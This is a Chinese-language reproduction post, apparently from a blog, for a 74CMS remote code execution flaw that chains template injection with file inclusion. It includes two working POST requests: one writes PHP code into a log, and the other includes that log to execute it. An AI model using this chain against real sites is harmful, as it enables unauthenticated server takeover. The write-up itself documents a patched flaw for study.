声明

好好学习,天天向上

漏洞描述

骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。

骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。

影响范围

骑士 CMS < 6.0.48

复现过程

这里使用6.0.20版本

使用phpstudy小白皮,好用的1P

74cms下载地址

http://www.74cms.com/download/index.html

环境启动后,访问

http://192.168.31.61/upload/install.php

安装过程还是很简单的

安装后,访问

http://192.168.31.61/upload/index.php

使用火狐hackbar发送POST

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

可以看到日志记录

包含这条日志,注意路径和日志名称

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl

variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log

骑士CMS模版注入+文件包含getshell复现相关推荐

  1. (环境搭建+复现)74CMS模版注入+文件包含getshell

    0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案. 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞. ...

  2. 骑士cms文件包含getshell复现

    00X1 测试环境 骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址: http://www.74cms.com/download/index.html 注意 ...

  3. php excel中解析显示html代码_骑士cms从任意文件包含到远程代码执行漏洞分析

    前言 前些日子,骑士cms 官方公布了一个系统紧急风险漏洞升级通知:骑士cms 6.0.48存在一处任意文件包含漏洞,利用该漏洞对payload文件进行包含,即可造成远程代码执行漏洞.这篇文章将从漏洞 ...

  4. index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

    CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...

  5. [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)

    [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell) [HXBCTF 2021]easywill 1.WillPHP ...

  6. cms php vue 开源_骑士CMS文件包含+getshell

    0x00简单介绍 骑士cms人才系统,是一项基于php+mysql为核心的开源人才网站系统. 0x01漏洞概述 骑士cms官方发布安全更新,修复了一处远程代码执行漏洞.由于骑士cms某些函数过滤不严谨 ...

  7. [网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含缺陷复现及防御措施(CVE-2018-12613)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文通过两个题目分享了DirBuster扫描目录.Fuzzy爆破指定路径名称,通 ...

  8. phpmyadminV4.8.1本地文件包含漏洞复现

    文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...

  9. 【CVE-2018-12613】phpmyadmin 4.8.1 远程文件包含漏洞复现

    **环境:**http://62.234.56.138:8080/server_databases.php 官网下载phpmyadmin 4.8.1 源码:index.php文件中 函数含义: tar ...

最新文章

  1. Julia数据统计最全教程,代码图解全都有,昆士兰大学出品,公开免费阅读
  2. java 虚拟机_浅谈Java虚拟机内存区
  3. when is oPropagatedProperties of detail view being generated
  4. MockupBuilder
  5. Oracle工具之--ASM与文件系统及跨网络传输文件
  6. java运算符 —(5)
  7. 数据结构基础:算法的基础知识笔记
  8. MySQL命令:增删与改
  9. 转:Linux网络IO并行化技术概览
  10. 支付宝超硬硬件发布: 将颠覆现有支付方式!
  11. 一只踏入持续学习路上的程序猿
  12. 一款Java开源的Springboot 即时通讯 IM 聊天系统,附源码下载地址!
  13. list index out of range
  14. Python简单爬虫(以爬取豆瓣高分图书为例)
  15. leetcode小坑 ‘int’ object has no attribute ‘val‘
  16. css 使盒子之间有间距 两边对齐
  17. 【技术分享】Win10 wampserver升级安装php7.2.32
  18. 概率论与数理统计学习笔记——第13讲——依概率收敛的意义
  19. iOS 10权限设置
  20. 爬取搜搜问问的一个实例

热门文章

  1. fastJson 将json转换成LinkedHashmap,全部有序
  2. android sd卡获取不到,解决Android10读取不到/sdcard/、/storage/emulated/0/文件的问题
  3. 简单的记录一下使用HAL库的SPI外挂W25Q32
  4. HTML用户名判断,用户名判断(练习)
  5. 权重推送 产品定位 直通车投放 关键词 直通车人群 创意标题 补单 新手上路,直通车烧钱没效果怎么办?
  6. AC Dream1069
  7. 用文件保存游戏服务器数据恢复,玩植物大战僵尸等单机游戏时,存档丢失了怎么数据恢复?...
  8. 简单使用萤石云,实时直播,监控回放
  9. 农信计算机资料录入试题,农村信用社计算机考试试题.docx
  10. DApp 上线 BitPortal币通钱包申请指南